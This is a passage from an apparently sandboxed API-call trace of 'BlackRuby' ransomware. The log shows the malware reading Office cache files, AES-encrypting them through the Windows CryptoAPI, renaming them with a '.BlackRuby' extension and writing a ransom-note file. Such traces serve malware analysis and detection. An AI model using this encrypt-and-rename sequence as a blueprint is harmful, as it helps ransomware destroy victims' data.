0x184 [0045.585] GetLastError () returned 0x0 [0045.585] GetFileType (hFile=0x184) returned 0x1 [0045.585] SetErrorMode (uMode=0x0) returned 0x1 [0045.585] GetFileType (hFile=0x184) returned 0x1 [0045.586] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x978 [0045.586] GetLastError () returned 0x0 [0045.586] ReadFile (in: hFile=0x184, lpBuffer=0x1c8a64c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c8a64c*, lpNumberOfBytesRead=0x18ed84*=0x978, lpOverlapped=0x0) returned 1 [0045.600] GetLastError () returned 0x0 [0045.600] CloseHandle (hObject=0x184) returned 1 [0045.600] GetLastError () returned 0x0 [0045.600] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.600] GetLastError () returned 0x0 [0045.600] SetErrorMode (uMode=0x1) returned 0x0 [0045.600] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3dff8840, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x978)) returned 1 [0045.601] GetLastError () returned 0x0 [0045.601] SetErrorMode (uMode=0x0) returned 0x1 [0045.601] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0045.601] GetLastError () returned 0x0 [0045.636] CryptImportKey (in: hProv=0x37c708, pbData=0x1ce639c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360de0) returned 1 [0045.636] GetLastError () returned 0x0 [0045.636] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.636] GetLastError () returned 0x0 [0045.641] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.641] GetLastError () returned 0x0 [0045.641] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e20) returned 1 [0045.641] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.641] GetLastError () returned 0x0 [0045.641] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1d133e8*=0x1, dwFlags=0x0) returned 1 [0045.641] GetLastError () returned 0x0 [0045.641] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1d133b4, dwFlags=0x0) returned 1 [0045.641] GetLastError () returned 0x0 [0045.642] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d13430*, pdwDataLen=0x18ed74*=0xa70, dwBufLen=0xa70 | out: pbData=0x1d13430*, pdwDataLen=0x18ed74*=0xa70) returned 1 [0045.642] GetLastError () returned 0x0 [0045.642] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d1493c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d1493c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.642] GetLastError () returned 0x0 [0045.642] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d1496c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d1496c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.642] GetLastError () returned 0x0 [0045.642] CryptDestroyKey (hKey=0x360de0) returned 1 [0045.642] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.642] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.642] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.642] GetLastError () returned 0x0 [0045.642] SetErrorMode (uMode=0x1) returned 0x0 [0045.642] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.643] GetLastError () returned 0xb7 [0045.643] GetFileType (hFile=0x184) returned 0x1 [0045.643] SetErrorMode (uMode=0x0) returned 0x1 [0045.643] GetFileType (hFile=0x184) returned 0x1 [0045.644] CloseHandle (hObject=0x184) returned 1 [0045.645] GetLastError () returned 0xb7 [0045.645] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.645] GetLastError () returned 0xb7 [0045.645] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Encrypted_DYfwZjJx6WPteulpx2oFSOW9PNRub2MBc7yXX9J7q3t87X.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Encrypted_DYfwZjJx6WPteulpx2oFSOW9PNRub2MBc7yXX9J7q3t87X.BlackRuby", lpFilePart=0x0) returned 0x81 [0045.645] GetLastError () returned 0xb7 [0045.645] SetErrorMode (uMode=0x1) returned 0x0 [0045.645] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x236828a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xa80)) returned 1 [0045.645] GetLastError () returned 0xb7 [0045.645] SetErrorMode (uMode=0x0) returned 0x1 [0045.645] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Encrypted_DYfwZjJx6WPteulpx2oFSOW9PNRub2MBc7yXX9J7q3t87X.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\encrypted_dyfwzjjx6wpteulpx2ofsow9pnrub2mbc7yxx9j7q3t87x.blackruby")) returned 1 [0045.646] GetLastError () returned 0xb7 [0045.650] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.650] GetLastError () returned 0xb7 [0045.650] SetErrorMode (uMode=0x1) returned 0x0 [0045.650] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.650] GetLastError () returned 0x0 [0045.650] GetFileType (hFile=0x184) returned 0x1 [0045.650] SetErrorMode (uMode=0x0) returned 0x1 [0045.650] GetFileType (hFile=0x184) returned 0x1 [0045.651] CloseHandle (hObject=0x184) returned 1 [0045.651] GetLastError () returned 0x0 [0045.651] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.651] GetLastError () returned 0x0 [0045.651] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.651] GetLastError () returned 0x0 [0045.651] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordLR.cab", lpFilePart=0x0) returned 0x49 [0045.651] GetLastError () returned 0x0 [0045.651] SetErrorMode (uMode=0x1) returned 0x0 [0045.651] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\wordlr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1b3946c | out: lpFileInformation=0x1b3946c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac01c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xac01c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3d438b40, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x29c63a3)) returned 1 [0045.652] GetLastError () returned 0x0 [0045.652] SetErrorMode (uMode=0x0) returned 0x1 [0045.652] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.652] GetLastError () returned 0x0 [0045.652] SetErrorMode (uMode=0x1) returned 0x0 [0045.652] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.652] GetLastError () returned 0x5 [0045.653] SetErrorMode (uMode=0x0) returned 0x1 [0045.653] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.msi", lpFilePart=0x0) returned 0x4a [0045.654] GetLastError () returned 0x5 [0045.654] SetErrorMode (uMode=0x1) returned 0x0 [0045.654] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\wordmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1b573c0 | out: lpFileInformation=0x1b573c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20354600, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x20354600, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3d411a40, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x1bc400)) returned 1 [0045.654] GetLastError () returned 0x5 [0045.654] SetErrorMode (uMode=0x0) returned 0x1 [0045.654] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.654] GetLastError () returned 0x5 [0045.655] SetErrorMode (uMode=0x1) returned 0x0 [0045.655] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.655] GetLastError () returned 0x5 [0045.656] SetErrorMode (uMode=0x0) returned 0x1 [0045.656] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", lpFilePart=0x0) returned 0x4a [0045.656] GetLastError () returned 0x5 [0045.656] SetErrorMode (uMode=0x1) returned 0x0 [0045.656] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\wordmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b75318 | out: lpFileInformation=0x1b75318*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3d3ed050, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x708)) returned 1 [0045.657] GetLastError () returned 0x5 [0045.657] SetErrorMode (uMode=0x0) returned 0x1 [0045.657] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", lpFilePart=0x0) returned 0x4a [0045.657] GetLastError () returned 0x5 [0045.657] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", lpFilePart=0x0) returned 0x4a [0045.657] GetLastError () returned 0x5 [0045.657] SetErrorMode (uMode=0x1) returned 0x0 [0045.657] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.657] GetLastError () returned 0x0 [0045.657] GetFileType (hFile=0x184) returned 0x1 [0045.657] SetErrorMode (uMode=0x0) returned 0x1 [0045.657] GetFileType (hFile=0x184) returned 0x1 [0045.657] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x708 [0045.657] GetLastError () returned 0x0 [0045.657] ReadFile (in: hFile=0x184, lpBuffer=0x1b77a44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b77a44*, lpNumberOfBytesRead=0x18ed84*=0x708, lpOverlapped=0x0) returned 1 [0045.692] GetLastError () returned 0x0 [0045.692] CloseHandle (hObject=0x184) returned 1 [0045.692] GetLastError () returned 0x0 [0045.692] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", lpFilePart=0x0) returned 0x4a [0045.692] GetLastError () returned 0x0 [0045.692] SetErrorMode (uMode=0x1) returned 0x0 [0045.692] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\wordmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3d3ed050, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x708)) returned 1 [0045.692] GetLastError () returned 0x0 [0045.692] SetErrorMode (uMode=0x0) returned 0x1 [0045.692] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0045.693] GetLastError () returned 0x0 [0045.731] CryptImportKey (in: hProv=0x37c680, pbData=0x1bd352c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360aa0) returned 1 [0045.731] GetLastError () returned 0x0 [0045.731] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.731] GetLastError () returned 0x0 [0045.736] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.736] GetLastError () returned 0x0 [0045.736] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360d60) returned 1 [0045.736] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.736] GetLastError () returned 0x0 [0045.736] CryptSetKeyParam (hKey=0x360d60, dwParam=0x4, pbData=0x1c00578*=0x1, dwFlags=0x0) returned 1 [0045.736] GetLastError () returned 0x0 [0045.736] CryptSetKeyParam (hKey=0x360d60, dwParam=0x1, pbData=0x1c00544, dwFlags=0x0) returned 1 [0045.736] GetLastError () returned 0x0 [0045.736] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c005c0*, pdwDataLen=0x18ed74*=0x800, dwBufLen=0x800 | out: pbData=0x1c005c0*, pdwDataLen=0x18ed74*=0x800) returned 1 [0045.736] GetLastError () returned 0x0 [0045.736] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c015ec*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c015ec*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.736] GetLastError () returned 0x0 [0045.736] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c0161c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c0161c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.736] GetLastError () returned 0x0 [0045.736] CryptDestroyKey (hKey=0x360aa0) returned 1 [0045.736] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.736] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.736] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", lpFilePart=0x0) returned 0x4a [0045.736] GetLastError () returned 0x0 [0045.736] SetErrorMode (uMode=0x1) returned 0x0 [0045.737] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.737] GetLastError () returned 0xb7 [0045.737] GetFileType (hFile=0x184) returned 0x1 [0045.737] SetErrorMode (uMode=0x0) returned 0x1 [0045.738] GetFileType (hFile=0x184) returned 0x1 [0045.739] CloseHandle (hObject=0x184) returned 1 [0045.739] GetLastError () returned 0xb7 [0045.739] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml", lpFilePart=0x0) returned 0x4a [0045.739] GetLastError () returned 0xb7 [0045.739] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Encrypted_76J0jgRbqzJVEVTcK92caamlZRlSQpuXZKL0hUayWei.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Encrypted_76J0jgRbqzJVEVTcK92caamlZRlSQpuXZKL0hUayWei.BlackRuby", lpFilePart=0x0) returned 0x7e [0045.739] GetLastError () returned 0xb7 [0045.739] SetErrorMode (uMode=0x1) returned 0x0 [0045.740] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\wordmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x237670e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x810)) returned 1 [0045.740] GetLastError () returned 0xb7 [0045.740] SetErrorMode (uMode=0x0) returned 0x1 [0045.740] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Encrypted_76J0jgRbqzJVEVTcK92caamlZRlSQpuXZKL0hUayWei.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\encrypted_76j0jgrbqzjvevtck92caamlzrlsqpuxzkl0huaywei.blackruby")) returned 1 [0045.740] GetLastError () returned 0xb7 [0045.740] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.740] GetLastError () returned 0xb7 [0045.740] SetErrorMode (uMode=0x1) returned 0x0 [0045.741] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.741] GetLastError () returned 0x5 [0045.741] SetErrorMode (uMode=0x0) returned 0x1 [0045.742] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.742] GetLastError () returned 0x5 [0045.742] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.742] GetLastError () returned 0x5 [0045.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.742] GetLastError () returned 0x5 [0045.742] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.742] GetLastError () returned 0x5 [0045.742] SetErrorMode (uMode=0x1) returned 0x0 [0045.742] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360aa0 [0045.758] GetLastError () returned 0x5 [0045.758] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.759] GetLastError () returned 0x5 [0045.759] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.759] GetLastError () returned 0x5 [0045.759] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.759] GetLastError () returned 0x5 [0045.759] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: 